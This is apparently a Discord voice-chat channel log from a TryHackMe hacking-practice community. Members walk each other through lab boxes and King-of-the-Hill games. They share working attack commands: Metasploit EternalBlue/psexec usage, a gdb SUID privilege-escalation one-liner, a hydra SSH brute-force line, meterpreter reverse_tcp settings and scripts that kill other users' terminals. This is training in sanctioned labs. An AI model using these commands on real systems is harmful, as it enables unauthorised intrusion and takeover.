#voice-chat
1 messages Β· Page 14 of 1
ok
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143```
now what am i supost to fox on on the scan result
u can see its vulnerable to ms17-010
if u search for CVE u can see the metasploit has the exploit
what does that mean
@tough lake it mean u can use the bug and exploit into machine
ok
i did
Matching Modules
Name Disclosure Date Rank Check Description
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/doublepulsar_rce 2017-04-14 great Yes DOUBLEPULSAR Payload Execution and Neutralization
3 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
4 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
5 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
i found this
will i set or use the other command
after u complete use exploit or run command
sorry for me
did u do that?? @tough lake
no problem??
set RHOSTS <machine_IP or TARGET_IP>
RHOSTS in metasploit mean ur target ip
LHOST mean ur IP
LPORT mean the port that u want to listen on
msf5 > run
[-] Unknown command: run.
msf5 > exploid
[-] Unknown command: exploid.
msf5 >
the RPORT mean the target vulnerable port that u want to exploit it
msf5 > run
[-] Unknown command: run.
msf5 > exploid
[-] Unknown command: exploid.
msf5 >
@tough lakeexploit
spelling issue
use run command
so can i do instad
msf5 > show options
Global Options:
Option Current Setting Description
ConsoleLogging false Log all console input and output
LogLevel 0 Verbosity of logs (default 0, max 3)
MeterpreterPrompt meterpreter The meterpreter prompt string
MinimumRank 0 The minimum rank of exploits that will run without explicit confirmation
Prompt msf5 The prompt string
PromptChar > The prompt character
PromptTimeFormat %Y-%m-%d %H:%M:%S Format for timestamp escapes in prompts
SessionLogging false Log all input and output for sessions
TimestampOutput false Prefix all console output with a timestamp
ive never done it before
its wrote in msf5 exploit(exploit name)
ive never done it before
@tough lake wait
can u screen share
?
no
you go and do all the steps
msf5 exploit(windows/smb/ms17_010_psexec)
im watching you
these
maybe i did something wrong
use command use exploit/windows/smb/ms17_010_psexec
then run set RHOSTS 10.10.70.68
then run exploit
msf5 > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) >
ok
now run set RHOSTS 10.10.70.68
its running
ok
u can now try to find flags in that
and run the commands
u can use ?
for see help menu
wow
u can see u are in machine
the next step is PrivEsc
what is that
u need to convert winpeas to the target
what is that
@tough lake when u hack a machine u can run a commands as user
well how to do the PrivEsc
let me check one of the rooms for PrivEsc
also there is a room for windows PrivEsc if u want
ok
do you know how to get the king.txt file
here is winpeas
u can make a http server with python3 -m http.server in ur PC
then go and download it for ur TARGET PC
but for now i just testing for metasploit exploits to be root
im not good at windows really
ok
but lets play another box
i will do it
which machine is it?
shrek
random
@ancient olive wanna play this ??
shrek
yes
sure
@tough lake i give u a hint go to /robots.txt
in http port
then use linpeas to PrivEsc
dont forgot to give the permission to linpeas
how
dont forgot to give the permission to linpeas
@ancient olive
i got the private key
ok
i used ssh -i key ip-machine
echo '<copy paste private key>' > id_rsa
Yo , @ancient olive is here
ok
then
then use chmod 600 id_rsa
then ssh -i id_rsa shrek@10.10.193.1
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/usr/bin/chfn ---> SuSE_9.3/10
/usr/bin/chsh
/usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp ---> HP-UX_10.20
/usr/bin/su
/usr/bin/umount ---> BSD/Linux(08-1996)
/usr/bin/sudo ---> /sudo$
/usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
/usr/bin/gdb
/usr/bin/crontab
/usr/bin/run-parts
/usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/usernetctl
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper```
as u can see u can PrivEsc with gdb
and its SUID
so lets find it from gftobin
i am now root
see
did u get it @tough lake
run gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit for be root
ok
try that
i going to complete room
@kindred tide do u want to compelete a room together??
or go to koth
??
YES
Looks good
@ancient olive
I forgot my THM password @ancient olive
Lemme reset that
WTH
Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl
wrote in the file
LOL
@tough lake api of wat??
An application programming interface (API) is a computing interface which defines interactions between multiple software intermediaries. It defines the kinds of calls or requests that can be made, how to make them, the data formats that should be used, the conventions to follow, etc.
its in google @tough lake
k
@pale vine join the VC
i found port 21, 1000, 80
terrible
the port 1000 closed for me
sorry for my mouse
ok guys
bye
im tired
and want to sleep
2>/dev/null
The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis
@tame ether can i dm you without asking? π§
@sand agate not sure if streaming stuff non related to THM is allowed. specially an on going CTF

No i'm not
i feel like u would do good
well actually not
barely did two of the warm up challenges
Szy took most of those
aah ok
imma get gud and beat you in CTF szy soonβ’οΈ
imma get more points than you
(hopefully soon)
but after doing eJPT.in like a month or two
@tame ether hang on i think i know how to talk to you
@ancient olive hello
hello @tough lake
how are u doing today
Mourning!
hey
howdy
It turns out that my bluetooth headset just disentegrated π¦
The pcb and volume popped off of the skull candy
dammit
i'll fix it w/ hot glue after its charged up
"fix"
otoh .. no wi know how to dismantle the skull candy
π
@sand agate Do you do windows boxes too
Any recommendations on a decent one.. i did blue the other day, it's admittedly my weak point
just did one
I may not be a leet assembly programmer, but i'm fair w/ the *nix stuff
owo whats this?
o/
elite dangerous
gotta finish networks tonight
owo?
i'll be your reference yo
Dark will give u one too
y
e
DAMN
thats more than i make
projects are a plus, open source ones help a lot
120k aud -> 85k usd
ye
that's a good 13k more than I make
skidy dun bork
amazing
I use to use a ghetto program called "Vector Magic"
ghetto af
Its the Photoshop 101 class again!
:D
t he microwave stopped rite as my phone hit the 30 second limit so u guys couldnt see me eaeting the bread,.. im so sory....
I'm Irish you racist
I'm Irish you racist
@autumn quest Who's the racist, me or Spooks?
myself, obviously 
Reson why steve died, ty gooday
@real orbit Subaru's Mom > Echidna > Rem
python -c 'import pty; pty.spawn("/bin/bash")'
LOL how many hacker are in voice
try reverse ssh payload
i changed the password
try reverse ssh payload
@pale vine do we have ssh payload???
in the metasploit
nope
there is nothing called ssh payload in metasploit
@pale vine
ok found it payload/cmd/unix/reverse_ssh
but its too stupid
why u tried ssh port reverse_shell when we have netcat and other things to reverse_shell
I don't know which box was it , but it was kicking me again n again on netcat
so I used ssh one
actually I did trial and error with all 64 payloads it was giving me for that exploit
xD
Which room guys ?
nooo
you kicking me out
and you stoped the ssh server
that was a good one
GG
@plucky vault
can you show me how you made the king.txt doesn't work with the vim
command
aaaaa
ok
Just use echo ubay > king.txt
I put a while loop on it so it keeps putting my name in the file.
So you had my process and then put your name in there.
while (true) do echo ubay > king.txt; done &
and write on the other roots screens
while (true) do echo ubay > king.txt; done &
@plucky vault is this a commad or js code
That is Bash.
You need to be the root user for that.
so they cant see anything but what you write
when im the root what do i do
@plucky vault thanks man i appreciate that
Sorry my Discord is being crap.
First find out your pts number with the "ps" command
That way you don't accidently spam your own terminal.
Then issue the command "w"
To find out what terminal numbers (ptss) are on the machine.
Just go:
echo "<Your text to go to other terminal> > " /dev/pts/<pts number from "w" command>
I can stream it if you want.
that would be nice
hello
Task 9
Download all TryHackCIT VOD's
http://ryanmontgomery.me/CIT/TryHackCIT%20-%20Cybersecurity%20Bootcamp_Day1.mp4 -- Day 1
http://ryanmontgomery.me/CIT/TryHackCIT%20-%20Cybersecurity%20Bootcamp_Day2.mp4 -- Day 2
http://ryanmontgomery.me/CIT/TryHackCIT%20-%20Cybersecurity%20Bootcamp_Day3.mp4 -- Day 3
http://ryanmontgomery.me/CIT/TryHackCIT%20-%20Cybersecurity%20Bootcamp_Day4.mp4 -- Day 4
http://ryanmontgomery.me/CIT/TryHackCIT%20-%20Cybersecurity%20Bootcamp_Day5.mp4 -- Day 5
http://ryanmontgomery.me/CIT/TryHackCIT%20-%20Cybersecurity%20Bootcamp_Day6.mp4 -- Day 6
@plucky vault <--- best name
will share seed soon
π
404's 0day
Free promo's π
This would actually be a really fun podcast if you all started one
How do you download, anything that I can find is 1 hour max @midnight fern
anything curl or wget requires api
yeeee
I use YouTubeDL
Loved the sound effects haha
Mfw no curl or gobuster in Operator Handbook
That's not a bad idea tbh
http://ryanmontgomery.me/CIT/TryHackCIT%20-%20Cybersecurity%20Bootcamp_Day6.mp4%20%20--%20Day%206 404
Malware 

Put 'em up
π«

gobuster dir -u http://<Machine IP> -w /usr/share/dirb/wordlists/common.txt
-t 64
(dir is by default btw)
Dir is directory buster
You can check the manual for the different types
Is this kali 2020.2?
Gobuster broke on one of the kalis
Literally won't work
This goes for vms
Is dirbuster in kali 2020.2?
Yeah from the kali repo it's broken, gobuster is*
Dirbuster works tho
Yeah
Also dirbuster is recursive
It's a getaround
I'm making a directory buster tool in rust when I'm finished with my current project with Bee
Nice!
How do you become a tester π
Submit a sample
I don't want to though 
Just never thought about it
Submit a sample
@azure moss Vague
How do you become a tester π
@manic canyon A room tester?
I think we've probably got all we need just now, but generally speaking it's people who have a few rooms under their belt, and are part of the content creator's program. I think there may be a few exceptions to that, but you definitely need the experience of building them first
Have you restarted the box? you might have hammered it
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-01 18:32 EDT
Nmap scan report for 10.10.158.218
Host is up.
All 1000 scanned ports on 10.10.158.218 are filtered
Nmap done: 1 IP address (1 host up) scanned in 201.36 seconds
@fathom coyote I can RDP into your box just fine
try using remmina for RDP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 00:39 CEST
Nmap scan report for 10.10.158.218
Host is up (0.031s latency).
PORT STATE SERVICE
3389/tcp open ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 16.60 seconds
must be something with you vpn
Definitely VPN issue then
try an other vpn server
Issues can come up at any point tbh
If you're on VIP go to non-VIP
Try going to VIP then maybe
i'm on EU-VIP-2
apt install remmina
sudo apt update; sudo apt install remmina
or whatever it's called
Alright it's time for me to head off, early morning tomorrow. See you all
Night @manic canyon
hey
don't have a mic ??
hi
hi
hey all
Why do you sound like you are high @plucky vault
i am not high
sorry for the tag. nvm
its ok m8
Everything all good? (:
he has accused me of being high
afasik he sounds high, (no bias)
if i was high am i not allowed to be here?
Nothing like that. nvm.
so i wouldnt be allowed if i was high?
there was a group of people doing weed and drinking with cam on before but u say i not allowed to stay?
hi
hey
yo?
ay @lofty moat
KoTH invite link?
This one I think
@lofty moat wanna hop in 18 mins remaining?
i would but....
π
@fast wind bro stop
all oh them
the king permission
how do you even do that
??!!
im just ganna stop
@fast wind
what is your THM username?
UM240
Its called chatter.
ok
||||
you gotta teach me
Ah I can see that your names are going in temp files.
You are creating king file in loop I think
yes
also, ||the chattr binary on this machine is a prank by the creater, if you use it, it will kick you out.||
GG.
@lofty moat LMAO we know each other's main tricks
whats gonna happen in this one
lmao
ohhhh
@fast wind but for real how did you close the permission for the king.txt
ok
fresh wounds
@fast wind @lofty moat
can't even get the vpn to connect π€¦ββοΈ
M just sitting here, in nano, writing things what couldve helped yesterday
the max i have reached is typing yes in ssh so far
π€·ββοΈ
@fast wind so is chattr +i file.txt good
Yep, now think of how to overtake others, if they are using same command π
I think we should shift to DM, Because this might be a spoiler for others.
damn im so good
time to change wifi password
lmao nyan? seriously?
@sick moth join
public game starting in 5 minutes:
https://tryhackme.com/games/koth/join/86b55c6900382d6e5f4fc554
`#!/bin/bash
quantity=$(ls -1 /dev/pts | wc -l)
echo $quantity
for (( i=0; i<=$quantity; c++ ))
do
pkill -t -9 pts/$i
done
`
@fast wind just to be clear, i'm not using that script π
LMAO
is there a way to avoid something like this?
Dont have a pts.
is there a way for that?
Yep,
i'm feeling noob and dumb at the same moment
lmao
or Do they..
and for the oneline i know, but i'm improving my bash experience
which is basically 0
$ tty
not a tty
yep, that's what i was thinking about
so the "virtual" way should be getting a reverse and killing the script without doing the python stuff
or any pts spawn in general
pgrep sh | grep -v $(echo $$) | while read line; do kill -9 $line; done maybee
Use at your own risk
(Affected users have reported that their shells died. (sometimes))
actually i was making that to spam nyancats
that's why i was working on pts and not on processes
someone can help me with ssh pls, i just need help for 2 seconds π
Regarding?
regarding ?
Is it about room or KoTH?
about a room
^
@fast wind may i ask you a bash think when you are free?
i just can't connect to the machine
#room-help
@fast wind flying
sure
but i already do
nvm i'm ok
for (i=0; i<=var; i++) {
if (i !== $1) {
echo \`lol ${1}\`
} else {
// do nothing
}
}
some thing like that, but in bash @fast wind
that is js (and i struggled a lot writing that on discord
thanks, discovered something new
π
btw can you help me with that?
Just google about bash syntax(?) The tutorials can help wayy more then I can.
yep, i'm looking for
Hey Guys!
Hey bruh @woven coyote
What's going on
hello guys , why i can hear when connect to KOTH voice chat room , but when connecting to general room its become so laggy
@rustic fjord They're both set to the same bitrate, so there shouldn't be any difference.
i can try
r
sudo apt-get install net-tools
hi
@plucky vault ur laggin so bad π
Hi guys
hi π
hey, i need help with proxychains
#room-help if its related to a room. #general for anything else mate. But google it first
nah np nvm sry
@plucky vault You flooded your buffer.
You cat'd an obj that was streaming data
ctl c, d, or z
If your console looks like gibberish. you need to ctl l or something
He's pulling your leg. violating a box without a strict invite is against the rules
my bluetooth died π¦
emergency charge time
@slender kayak try mesg n
it will turn off messages broadcasting as i heard
@slender kayak ps aux its easier that ps -faux
also its better to use pkill to kill pts
also use while : instead of while true : the less u type the speedier u become @slender kayak
@plucky vault new chapter when?
@lofty moat chapter of ? XD
@lofty moat chapter of ? XD
@plucky vault solo leveling??
@lofty moat uhm i see u are a man of culture
i dunno maybe august 11 12
if not 11 then 12
Aah can't wait π
God of high school animation looks lit but manga is still is way more better
They are skipping so much of the stuff in that
yeah ..
Hey, doing wonderlang right now too!
ill get on in a bit too, dont leave guys
what is this multi tab window thing called
Gmm
pip install git+https://github.com/calebstewart/pwncat.git
@plucky vault exploit or run
set PAYLOAD <payload>
@plucky vault
set PAYLOAD windows/x64/meterpreter/reverse_tcp
@plucky vault
@alpine zephyr jani your open mic
sorry about that
@shadow arch welcome to the VC.. but i don't talk i just listen π€·ββοΈ
@plucky vault https://github.com/OJ/gobuster
the syntax is:
gobuster dir -u <ip> -w <path for wordlist> -t 50 (or more threads if you want)
@plucky vault why not use tmux?
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.105 -t 4 ssh
-t 64 *
-t 64 *
@limber lichen sometimest 64is worse.... i used 64 threads in Brooklyn nine nine and wasted 10 minutes for result while-t 4gave it instantly
π€·ββοΈ
@slender kayak who is playing koth?
π¦
I'm sad
no it was nothing much
he wrote a curl command in that exploit file
and got into a user
and he knows the privesc so he had already written that in cherry tree and copy pasted
and got root
no thats not bad
that's efficient

ok
@slender kayak you want me to show you something?
for hackers
just 30 seconds i will show you hackers
hackers
send me invite link for private game??
@slender kayak sudo -l
@slender kayak
sudo -l
π€·ββοΈ
Just me or no sounds?
Just you
you deafen your self
π€·ββοΈ
@alpine zephyr someone changed password for ashu so that's why you cant get in
i see
@lofty moat mentorship classes 101
@slender kayak what is the problem you are facing with sudo -l
@slender kayak no one saw anything
lmao
NOOOO
@slender kayak
:LAMO
stooop π
ok now i changed it to:
whodidit
nvrmnd
You playing this too? @lofty moat
@fast wind well not really
figured that already
i saw mentans streaming and i grabbed the ip π
LMAO
i'm not changing anything
i'm already root, already have my backdoors in. but i am not doing anything
let's see who wins, @alpine zephyr or @slender kayak
spec link?
I am watching mentats at this point
@lofty moat let'em play lol
@fast wind but i just ran one loop nothing else
LOL we both know what 1 loop means
ctrl + C i stopped nyancat @slender kayak
do what you gotta do naughty XDD
what you are trying to do though?
xD
upload your chatter @slender kayak
^^
download from the last folder 1.31.0-i686-uclibc/
@slender kayak
search for chattr it will be named busybox_CHATTR
2) chattr
3) download
4) upload using wget
5) chmod +x <your chattr>```
use lsattr king.txt to see if there is already chattr used on it or not
@slender kayak ^
You should try tmux, I think naughty mentioned that
@slender kayak try doing this room. tmux is really useful to run multiple tabs on one window
https://tryhackme.com/room/rptmux
something like this:
sudo apt update
ip addr
@alpine zephyr
@plucky vault ip addr
some machines can.
There's a package that he is missing.
send me the link 
@plucky vault i have shared some once.. i streamed once here and shared some tricks
where is da link 
@slender kayak, link for Naughty?
@slender kayak you are not supposed to close that
no, you can patch it
ok imma reset
stop spamming reset
....
hello from the other side
what is this ?
who is removing binaries?? π
@lofty moat is there a rule against spamming reset? As a mod, do I need to know anything about rules & KOTH? Asking you b/c to me you're π of KOTH 
There's docs I believe, Bee
@cursive herald there will be soon. i asked all mods many times 
skidy said he have done it now locally
will be added in next update
imagine running a wrong binary in a while loop 
@slender kayak
i didn't do anything π€·ββοΈ
we can reset if you want??
@slender kayak yeah i found your lhelpr π€·ββοΈ
reset
i did
for SpaceJam i only know three ways in and 2 privescs π€·ββοΈ
i have something do rn. will be back in an hour or so
peace out
good night
imagine running a wrong binary in a while loop
@slender kayak
@lofty moat lmao
deja vu
sometimes
he was just killing my shells so i replaced pkill 
lmao, alias pkill=exit


@slender kayak that's like gobuster right?
@glass venture mute yourself smh
VC party?
If you wanna hear Traveling Hex sure
I am having trouble with a tutorial(room) involving PuTTY and a machine that gives me an ip, if someone could help me please dm me. Thanks
Hacking classes 101 by szy.
He's showing his secret codes with which he can hack any room in 60 seconds.
That's how he is top 1/2
LOOL
He's showing his secret codes with which he can hack any room in 60 seconds.
@fast wind dont have any idea about this scripts
blacky blacky hatty hatty
static sites == unhackable
(except szy can hack them with his secret codes @ancient olive )


Spill your scripts szy
i joined and szy closed his stream π€·ββοΈ


I thought he was a cat.
Face reveal when?
Blonde.
time to share my secret scripts
π
imma play siege in other discord
.
@lofty moat rainbow 6?
@lofty moat rainbow 6?
@alpine zephyr yeah
nice I used to play that alot
my siege stats:
https://r6.tracker.network/profile/pc/Naughty.BB
nice

huuuuuuuuuuuuuuuuuuuuuuuuuh?
@plucky vault where r u
my friend called me
I thought i was your friend T_T
ye
yeppp
what did i just i joined into
come on @lofty moat all of us want to see ur face LOL π π€£
you won't even get to hear my voice π
π€«
yeah like 2 words
he use voice changer i think
HAHAHA
that was voice changer 
really??
me 2
where are u from
how u doing?
m from India.
cool
i made a new account on thm
wanna stream?
lets do it together
okk no worries
i dont have much good too
yes
i can see
okk
@proud stag where r u from?
france
cool
cool place
i can see that
try searching on msf
ya you are correct go on
i sometime feel some things arent in searchsploit thats on exploitdb
try on exploitdb
yes it's true
it will show you rating too
and thats given on the question
try cve details
maybe
yes i will try
Sony WH-1000XM3
Great headphones
hey @tame ether
No one talking or my handsfree not working? π€
@tame ether i am here so that no one bully ya
lol
i am sure pars bully u
i m kidn
who ?
ah.. lol, haven't had much interaction with him yet
π
Szy getting bullied? But szy always bully dark π€·ββοΈ
Szy is da #1 bully in THM
voice changer @tame ether ???
Szy do face reveal

well i don't mind if szy bullies you all xD
